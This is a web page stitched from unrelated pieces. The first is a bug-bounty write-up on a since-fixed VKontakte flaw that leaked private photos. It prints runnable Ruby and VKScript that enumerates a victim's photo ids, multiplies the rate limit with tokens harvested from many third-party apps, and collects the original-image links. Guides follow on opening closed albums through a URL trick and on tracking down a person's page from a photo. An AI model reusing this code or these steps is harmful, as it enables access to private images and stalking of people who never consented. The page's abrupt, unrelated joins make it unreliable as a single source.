Private hidden in vk. Hidden features of VK.API or looking for private photos on VKontakte. Working with the address bar

tl;dr

A vulnerability was found in VK bookmarks that made it possible to obtain direct links to private photos from the personal messages and albums of any user or group. A script was written that enumerated a user's photos over a given period and then, through this vulnerability, obtained direct links to the images. In short, you could get all of a user's photos from yesterday in 1 minute, all photos uploaded last week in 7 minutes, last month in 20 minutes and last year in 2 hours. The vulnerability has since been fixed. The VKontakte administration paid a reward of 10k votes (VK's internal currency).


The story began when an image was sent to me in a personal message on VKontakte. Usually, if something is important, I upload it to the cloud, but in my case this was not necessary, and I decided to use the VKontakte bookmarking function.

Briefly about this functionality: everything the user has liked is added to bookmarks, and there is also a way to manually add a link to a user or an internal VKontakte link. The last point seemed the most interesting to me, because after adding a link to a photo I saw its preview, together with text naming the type of entity that was added:

When a link is added, the server parses it, tries to work out what entity it refers to and retrieves information about that object from the database. When a function like this has many branches, the likelihood that the developer forgot something is high, so I could not pass it up and decided to spend a few minutes experimenting.

As a result, I did find something. By adding a link to a photo, note or video that was not accessible to me, I could get a little private information about the object. For photos and videos this was a small (150x150) preview on which it is hard to make anything out; for private notes the title was displayed. Via the API method fave.getLinks it was possible to get links to the image, but again the sizes were too small (75px and 130px). So, essentially, nothing serious.

I decided to check the mobile version of the site to see whether it displayed everything the same way as the regular version. Looking at the page source, I saw this:

Yes! The value of the data-src_big attribute was a direct link to the original image!

Thus it was possible to obtain a direct link to any image on VKontakte, regardless of where it had been uploaded and what privacy settings applied to it. It could be an image from personal messages or a photo from a private album of any user or group.
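The bug class here is a link resolver that fetches an object and hands the template everything it knows about it, leaving privacy to whichever view happens to omit a field. Below is an added example in Ruby, not VKontakte's code, that shows the vulnerable shape next to a hardened one. The Photo and User model, the PHOTOS table, can_view? and the sample objects are assumptions made for the example.

```ruby
# Added example, not VKontakte's code: a minimal bookmark link resolver that
# reproduces the bug class from the text (object looked up and rendered with
# no authorization check) next to a hardened version. The Photo/User model,
# the PHOTOS table and can_view? are assumptions made for the example.

Photo = Struct.new(:owner_id, :id, :privacy, :src_small, :src_big)
User  = Struct.new(:id, :friend_ids)

# Constructed sample objects; privacy is :all, :friends or :only_me.
PHOTOS = {
  "photo1_100" => Photo.new(1, 100, :all,     "https://cdn.example/s/100.jpg", "https://cdn.example/big/100.jpg"),
  "photo1_101" => Photo.new(1, 101, :friends, "https://cdn.example/s/101.jpg", "https://cdn.example/big/101.jpg"),
  "photo1_102" => Photo.new(1, 102, :only_me, "https://cdn.example/s/102.jpg", "https://cdn.example/big/102.jpg")
}.freeze

# Accepts vk.com/photoOWNER_ID and the mobile m.vk.com form; returns the
# object key ("photo1_100") or nil for anything that is not a photo link.
PHOTO_LINK = %r{\A(?:https?://)?(?:m\.)?vk\.com/(photo\d+_\d+)\z}

def parse_photo_link(link)
  m = PHOTO_LINK.match(link.to_s.strip)
  m && m[1]
end

def can_view?(user, photo)
  return true if user.id == photo.owner_id
  case photo.privacy
  when :all     then true
  when :friends then user.friend_ids.include?(photo.owner_id)
  else false
  end
end

# Vulnerable: resolves the object and returns every stored field. Which
# template shows src_big (desktop hid it, mobile exposed it as data-src_big)
# is then the only thing standing between a stranger and the original image.
def preview_vulnerable(_user, link)
  key   = parse_photo_link(link)
  photo = key && PHOTOS[key]
  return { type: "link", link: link } unless photo
  { type: "photo", src: photo.src_small, src_big: photo.src_big }
end

# Hardened: authorize before reading object fields, and give an unauthorized
# id exactly the answer an unknown id gets. Anything else (a "private photo"
# stub, a 150x150 thumbnail) is an oracle that id enumeration would use to
# confirm which ids exist.
def preview_hardened(user, link)
  key   = parse_photo_link(link)
  photo = key && PHOTOS[key]
  return { type: "link", link: link } unless photo && can_view?(user, photo)
  { type: "photo", src: photo.src_small, src_big: photo.src_big }
end
```

The hardened version answers an unauthorized id exactly as it answers an id that does not exist. That matters for the rest of the post: a thumbnail or a "private photo" label on a resolvable id is an existence oracle, and an existence oracle is what turns guessing ids into enumeration.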

It would seem I could have stopped there and written to the developers, but I wondered whether, by exploiting this vulnerability, it was possible to get at all of a user's photos (or those uploaded in a given period). The main problem, as you can guess, is that the link to a private photo, of the form photoXXXXXX_XXXXXXXX, is not normally known, so there is nothing to bookmark. The idea of enumerating photo IDs came to mind, but for some reason I immediately rejected it as crazy. I checked the photo-related API methods and looked at how the application works with albums, but I could not find any leak that would give me a list of the IDs of all the user's private photos. I was about to give up on the idea, but looking once more at the photo link, I suddenly realized that brute force was a good idea after all.

How photos work in VK

As you may have noticed, a link to a photo such as photo52708106_359542386 consists of two parts: (user id)_(some strange number). How is the second part formed?

Alas, after two hours of experimenting I still did not understand it. In 2012, at HighLoad++, Oleg Illarionov said a few words about how VK stores photos, about horizontal sharding and random selection of a server for each upload, but this information did not help, because there is no connection between the server id and the photo id. Clearly there is some kind of global counter, but with some other logic on top... If the second number were produced by an ordinary auto-increment, photo IDs would long ago have reached huge values (at Facebook, for example, it is currently ~700 trillion), whereas for VKontakte the value is only ~400 million (although, judging by the statistics, users upload more than 30 million photos a day). That is, the number is clearly not unique, but at the same time it is not random. I wrote a script that went through the photos of "old" users and, from the data collected, plotted how this number changed from year to year:

It can be seen that the values fluctuate depending on some factors (the number of servers, or new logic?). The point, however, is that they are small enough (especially in the last 2-3 years) that it is very easy to work out the id range for a desired time period. That is, to learn the direct links to a user's photos from, say, last year, you only need to try bookmarking 30 million (from _320000000 to _350000000) different link variants! Below I describe a brute-force technique that let me do this in a matter of minutes.

Going through the photos

You could add all of these manually through the interface, or write a script that adds one link at a time to bookmarks, but that would be boring and time-consuming. The enumeration speed in that case would be 3 bookmarks per second, because the VKontakte API forbids sending more than three requests per second.

Speed ​​up the search x25

To get around the 3-request limit at least a little, I decided to use the execute method. One call to this method can make 25 calls to API methods.

    var start = parseInt(Args.start);
    var end = parseInt(Args.end);
    var victimId = Args.id;
    var link = "http://vk.com/photo" + victimId + "_";
    while (start != end) {
        API.fave.addLink({ "link": link + start });
        start = start + 1;
    };
This raised the brute-force speed to 3*25 = 75 bookmarks per second. Enumerating a whole year's worth of photos would still take a long time, but for short periods this was already workable.

Speed ​​up the search x25 * number of parallel requests per second

The requests-per-second limit applies to each application separately, not to the user as a whole. So nothing stops you from sending many requests in parallel, as long as each one uses a token from a different application.

First we needed to find (or create) the required number of applications. A script was written that searches for standalone applications in a given range of application identifiers:

    require "open-uri"
    require "json"

    class StandaloneAppsFinder
      attr_reader :app_ids

      def initialize(params)
        @range = params[:in_range]
        @app_ids = []
      end

      # Walk the app-id range and keep only standalone applications,
      # the type for which VK issues tokens through the Implicit Flow.
      def search
        @range.each do |app_id|
          response = URI.open("https://api.vk.com/method/apps.get?app_id=#{app_id}").read
          app = JSON.parse(response)["response"]
          app_ids << app_id if standalone?(app)
        end
      end

      private

      def standalone?(app_data)
        app_data["type"] == "standalone"
      end
    end

It was also possible to select applications by the number of users in order to further speed up the search:

OK, the applications have been found; now they need to be granted access to our user's data so that we can receive tokens. For authorization we had to use the Implicit Flow. I had to parse the authorization URL out of the OAuth dialog and pull the token out of the redirect. This class needs the p and l cookies (from login.vk.com) and the remixsid cookie (from vk.com) to work:

    require "open-uri"
    require "nokogiri"

    class Authenticator
      attr_reader :access_tokens

      # cookie_header: "p=...; l=...; remixsid=..." of an already logged-in user
      def initialize(cookie_header)
        @cookies = { "Cookie" => cookie_header }
        @access_tokens = []
      end

      # For each app: load the OAuth dialog, submit its consent form and read
      # the token out of the fragment of the redirect URL (Implicit Flow).
      def authorize_apps(apps)
        apps.each do |app_id|
          auth_url = extract_auth_url_from(oauth_page(app_id))
          redirect_url = URI.open(auth_url, @cookies).base_uri.to_s
          access_tokens << extract_token_from(redirect_url)
        end
      end

      private

      def extract_auth_url_from(oauth_page_html)
        Nokogiri::HTML(oauth_page_html).css("form").attr("action").value
      end

      # The redirect looks like .../blank.html#access_token=...&expires_in=...&user_id=...
      # so the token is one parameter of the fragment, not the whole fragment.
      def extract_token_from(url)
        URI.decode_www_form(URI(url).fragment.to_s).to_h["access_token"]
      end

      def oauth_page(app_id)
        URI.open(oauth_page_url(app_id), @cookies).read
      end

      def oauth_page_url(app_id)
        "https://oauth.vk.com/authorize?" +
          "client_id=#{app_id}&" +
          "response_type=token&" +
          "display=mobile&" +
          "scope=474367"
      end
    end

The number of applications found equals the number of parallel requests. To parallelize all this, I used the Typhoeus gem, which has proven itself in other tasks. The result is a small brute forcer like this:

    require "typhoeus"
    require "uri"

    class PhotosBruteforcer
      # Photo-id windows read off the graph above (values at the time of writing)
      PHOTOS_ID_BY_PERIOD = {
        "today"         => 366300000..366500000,
        "yesterday"     => 366050000..366300000,
        "current_month" => 365000000..366500000,
        "last_month"    => 360000000..365000000,
        "current_year"  => 350000000..366500000,
        "last_year"     => 320000000..350000000
      }

      def initialize(params)
        @victim_id = params[:victim_id]
        @period = PHOTOS_ID_BY_PERIOD[params[:period]]
      end

      # One execute call per 25 ids; tokens are used round-robin, and the
      # queue is flushed each time every token has been handed a request.
      # URI.encode_www_form replaces the URI.escape call of the original
      # (removed in Ruby 3) and takes care of "+" and newlines in the code.
      def run(tokens)
        hydra = Typhoeus::Hydra.new
        token_index = 0
        @period.step(25) do |photo_id|
          query = URI.encode_www_form(access_token: tokens[token_index], code: vkscript(photo_id))
          token_index = token_index == tokens.count - 1 ? 0 : token_index + 1
          hydra.queue Typhoeus::Request.new("https://api.vk.com/method/execute?#{query}")
          hydra.run if token_index.zero?
        end
        hydra.run unless hydra.queued_requests.count.zero?
      end

      private

      def vkscript(photo_id)
        <<-VKSCRIPT
          var start = #{photo_id};
          var end = #{photo_id + 25};
          var link = "http://vk.com/photo#{@victim_id}" + "_";
          while (start != end) {
            API.fave.addLink({ "link": link + start });
            start = start + 1;
          };
          return start;
        VKSCRIPT
      end
    end

To speed up the brute force even more, there was an attempt to get rid of the unnecessary body in the response, but

    require "nokogiri"
    require "open-uri"
    require "typhoeus"
    require "json"
    require "./standalone_apps_finder"
    require "./photos_bruteforcer"
    require "./authenticator"

    # usage: ruby <this file> <victim_id> <period>, where period is a key of PHOTOS_ID_BY_PERIOD
    bruteforcer = PhotosBruteforcer.new(victim_id: ARGV[0], period: ARGV[1])
    apps_finder = StandaloneAppsFinder.new(in_range: 4800000..4800500)
    apps_finder.search

    # p, l - cookies from login.vk.com
    # remixsid - cookie from vk.com
    authenticator = Authenticator.new("p=;" + "l=;" + "remixsid=;")
    authenticator.authorize_apps(apps_finder.app_ids)

    bruteforcer.run(authenticator.access_tokens)
After running the program, the bookmarks contained all of the user's photos for the given period. All that was left was to open the mobile version of VKontakte, open the browser console, pull out the direct links and enjoy the photos at their original size.
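Two parts of the procedure above are worth having in runnable form: the batching and token round-robin that turns the per-app rate limit into a multiplier (the "x25" and "x25 * parallel requests" sections), and the final harvest of data-src_big links from the mobile page. The following is an added example in Ruby, not the author's script; it works offline on constructed inputs. The token strings, the HTML sample and the helper names are assumptions; the limits (3 requests/s per app, 25 calls per execute) and the last_year range are the post's own figures.

```ruby
# Added example, not the author's code: the planning side of the enumeration
# described above, offline. It turns an id range into execute batches, spreads
# them over app tokens round-robin (the per-app limit is what makes several
# tokens add up), estimates wall-clock time from the limits the post quotes
# (3 requests/s per app, 25 calls per execute), and finally harvests the
# data-src_big links out of saved mobile-page HTML. Token strings and the
# HTML sample are constructed placeholders.

REQUESTS_PER_SECOND_PER_APP = 3
CALLS_PER_EXECUTE = 25

# VKScript for one execute call: bookmark `count` consecutive photo ids.
def vkscript(victim_id, first_id, count = CALLS_PER_EXECUTE)
  <<~VKSCRIPT
    var start = #{first_id};
    var end = #{first_id + count};
    var link = "http://vk.com/photo#{victim_id}_";
    while (start != end) {
      API.fave.addLink({ "link": link + start });
      start = start + 1;
    };
    return start;
  VKSCRIPT
end

# Split an inclusive or exclusive id range into batches of CALLS_PER_EXECUTE
# and assign tokens round-robin. Returns an array of
# { token:, first_id:, count:, code: }; the last batch may be short.
def plan_batches(victim_id, id_range, tokens)
  raise ArgumentError, "need at least one app token" if tokens.empty?
  last = id_range.max
  id_range.step(CALLS_PER_EXECUTE).each_with_index.map do |first_id, i|
    count = [CALLS_PER_EXECUTE, last - first_id + 1].min
    { token: tokens[i % tokens.size], first_id: first_id, count: count,
      code: vkscript(victim_id, first_id, count) }
  end
end

# Number of execute calls needed for id_count ids (ceiling division).
def batches_for(id_count)
  (id_count + CALLS_PER_EXECUTE - 1) / CALLS_PER_EXECUTE
end

# Lower bound on wall-clock seconds: every token is saturated at its own limit
# and no request stalls (the post notes that a single timeout breaks this).
def estimated_seconds(id_count, token_count, rps: REQUESTS_PER_SECOND_PER_APP)
  (batches_for(id_count).to_f / (token_count * rps)).ceil
end

# The inverse: how many app tokens finish id_count ids inside budget_seconds.
def tokens_needed(id_count, budget_seconds, rps: REQUESTS_PER_SECOND_PER_APP)
  (batches_for(id_count).to_f / (budget_seconds * rps)).ceil
end

# Harvest step: the mobile bookmarks page carries the original-size URL in
# data-src_big. Assumes double-quoted attribute values, as in the markup
# the post describes; duplicates (the same photo bookmarked twice) are dropped.
def extract_big_links(html)
  html.scan(/data-src_big="([^"]+)"/).flatten.uniq
end

if __FILE__ == $PROGRAM_NAME
  # last_year from the post: 320000000..350000000, about 30 million ids
  ids = 350_000_000 - 320_000_000
  puts "execute calls: #{batches_for(ids)}"
  puts "seconds with one token: #{estimated_seconds(ids, 1)}"
  puts "tokens for a 2-hour run: #{tokens_needed(ids, 2 * 3600)}"
end
```

With those limits, last year's 30 million ids are 1.2 million execute calls: a single app token needs about 111 hours, and finishing inside the 2 hours the tl;dr quotes takes 56 tokens, which is why the script hunts for a whole range of standalone applications rather than registering one.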

Results

In general, it all depends on your Internet connection, the speed of the proxy servers, the latency of the VKontakte servers, processor power and many other factors. Trying the script above on my own account, I got the following numbers (not counting the time spent obtaining tokens):

The table shows the average time needed to try the photo IDs for a given period. I am sure all of this could be sped up 10-20 times: for example, the brute-force script could keep one large queue of all requests with proper synchronization between them, because in my implementation a single request that times out slows down the whole batch. And in general you could simply rent a couple of EC2 instances and get all the photos of any user within an hour. But I already wanted to sleep.

And in general it does not matter how much time an attacker spends on this, 5 hours or a whole day, because one way or another he will get links to the private images. The ability to reliably gain access to private information in a finite amount of time is the main threat posed by this vulnerability.

Reporting a vulnerability

At first the report was sent to the support service, but after a reply along the lines of "thank you, we'll probably fix it somehow..." and a week of waiting, I felt kind of sad. Many thanks to Bo0oM, who helped me contact the developers directly. After that the bugs were closed within a few hours, and a few days later the administration transferred a reward of 10k votes to my account.


It often happens that you really need to look at the photos of a private VK profile. As you know, every user can choose the privacy level of their profile, so closing an entire album or individual photos is a matter of a few clicks. It turns out that closed photos can still be viewed! There are certain tricks and "holes", one of which we will tell you about today.

Keep in mind that they all get closed quickly, so it is not certain that this method, like any other, will still work in a week or a month.

You will need:

Opening the source code

First, try it. If the albums do not open, then proceed as follows. So, open the profile of the person whose photos we want to see. Next, we need to open the source code of this page.

To do this, right-click on an empty area of the page and look for "View page source", "Inspect element" or similar in the context menu. In Google Chrome you can also press F12. So, here is the page source. What next?

Looking for the required fragment

Using the Ctrl+F key combination, open the search bar and enter the word “albums” there.

There will be several results, but we need the one followed by numbers (this is the profile ID). As a rule, this is the third match from the top. Found it? Great, copy it with Ctrl+C.

Working with the address bar

So, we have the necessary code fragment. What next? To view hidden photos on VKontakte, return to the profile page (we no longer need the page with the source code).

In the browser address bar we see a link like vk.com/id####, where #### is the page ID. Place the cursor at the end of the address bar and type "?z=", then paste the fragment from the page source that we just found.

As a result, the address bar of the browser should contain the following: vk.com/id####?z=albums####, where #### is the person’s ID.

We press Enter, and all the photographs of the person open in front of us.

In this simple way you can view photos in a closed VKontakte album, and also see the list of albums of people who have left your friends list or of unknown users.

Frequently asked questions and answers

    How to view a VK user’s private album via phone?

    Instructions for viewing are the same as for viewing from a computer.

    What are the hidden possibilities of VKontakte?

    1. If you go to the “Settings” section and in the “General” tab change the language to pre-revolutionary or Soviet, the VKontakte interface will change slightly.
    2. If you want some information about you to remain empty on your personal page, then add a code in such fields.
    3. You can make an active link to any VKontakte group in the “Place of work” column. To do this, go to the "Edit" section, select the "Career" tab and in the "Place of work" section write the name of the community you are a member of.
    4. In the "Settings" section, the id can be changed to a short and memorable address.

    What service is there to view hidden photos in contacts?

    You need to find a photo in which the person is tagged, open it in quick view and scroll through the photos. Even though regular access to them is closed, you can view them. The technical service has not yet been able to close this "hole".

    How to view a private VK account?

    To view a private profile you need to:
    1. Find out the profile ID: hover the mouse over "NAME's Friends" and copy the link.
    2. *[link blocked by decision of the project administration].
    3. The numbers after "id=" are the profile ID.
    Copy these numbers and paste them into the necessary links.

    Who can see photos on VKontakte?

    Depending on who you gave access to your photos.

    How to see all photos in contact?

    This information is described in the article.

    How to see a photo of a group in VKontakte?

    Find a group or page that matches your interests, then select the option just below the “Communities” search bar. Then a little to the right you will see “Community Type” (check the box next to: any, group, page, meeting) and click search. A list of groups will open in which you can select the ones that suit you. If the group is open, you can easily view all its contents: audio, video, photos, discussions.
    If you are on a closed group page, pay attention to the upper right corner under the photo. It will say: “Subscribe” (to the page) or “Submit an application” (to the group).
    Please wait a while as your application is being reviewed by the group administrators. If they approve, the group will appear in the list on your page. You can now view all group content.

Hello, friends! Today we will search for people on the VKontakte social network by photo. Imagine we have only a photograph, and from it we need to find the person's page. This will only work if they uploaded the photo to the social network and did not hide it. It can be done; I have tested it in practice, there are a couple of proven methods and we will look at them now.

Search by photos on VKontakte

To use this function of the social network to find a person, we first need to upload the photo that we will use to search for the account. Then go to the album to which we added the photo and click on the photo itself so that it loads fully.

After the photo has loaded, look at the browser address bar and copy the address of the photo. You do not need to copy the entire address, only the part that starts with the word photo (including it) and ends before the % sign. Look at the screenshot and everything will become clear:

Now go to your home page and click on the “News” menu item

Almost at the very top of the page that opens, above the news, there is a search box. Type the word copy: into it, followed immediately by the address of the photo that you uploaded and want to search by.

See screenshot:

Press Enter. All identical photos uploaded to the social network by different users are loaded. Naturally, if the photo is unique, there will be only one such user. All you have to do is click on the photo and follow the link to its owner:

That's all, we have completed the task.

Search by images from Yandex

Now, for general education, I will show another way to find a person on VKontakte by photo. Note that it only works if the user has set the photo as their profile picture. We will be talking about image search in the Yandex search engine.

In the next window, click on the “Select file” button to upload the photo to the system for search.

Through Explorer, find the desired image on your computer, select it and click “Open”.

The system will show your picture and below all similar ones that it could find. With a high degree of probability, the first one will be a photo exactly similar to yours.

Scroll below and see a list of sites where the picture appears. Choose any of the proposed ones. In the example, I chose poisksocial.ru. Right-click on the title and select “Open link in new tab” from the list.

On the site that opens you can search for a person in any of the social networks listed on the left. VKontakte is already selected and a first and last name is filled in for which results are shown (by the way, I did not enter them; they were already there when I opened the site. Although I am looking for a person with a different name, for the purity of the experiment I changed nothing).

The window in the middle displays all available, suitable user pages. We scroll through them and yes, the person I need is there, and his avatar has the photo that I used to search.

Click on the name and on the next page select any photo from the photo gallery. The VKontakte page of the found user will open and you can assume that you have found him.

Google Image Search

The Google search engine has exactly the same service as Yandex. Let's also try to find my VKontakte page from the photo that is on my avatar.

Go to the Google home page and in the upper right corner click on the “Pictures” link:

We open the image search service, move the cursor to the right corner of the search bar and click on the camera icon. This button is called “Search by image”.

In the window that opens, go to the “Upload file” tab and click on the “Select file” button:

We upload the photo by which we want to search for a VKontakte account and observe the results.

I got queries related to formal clothing (since the photo shows people in black and white). And there was nothing in “Similar Images”.

If this is the case for you, let's refine the search a little. To do this, you need to enter the first and last name of the person you are looking for in the appropriate line (it is advisable that they coincide with how the user is subscribed to VK) and click on the magnifying glass.

As you can see, my VKontakte page has been found again, which means that we have reached our goal again. And with this I finish this article, in which we learned how to search for VK pages using photographs.
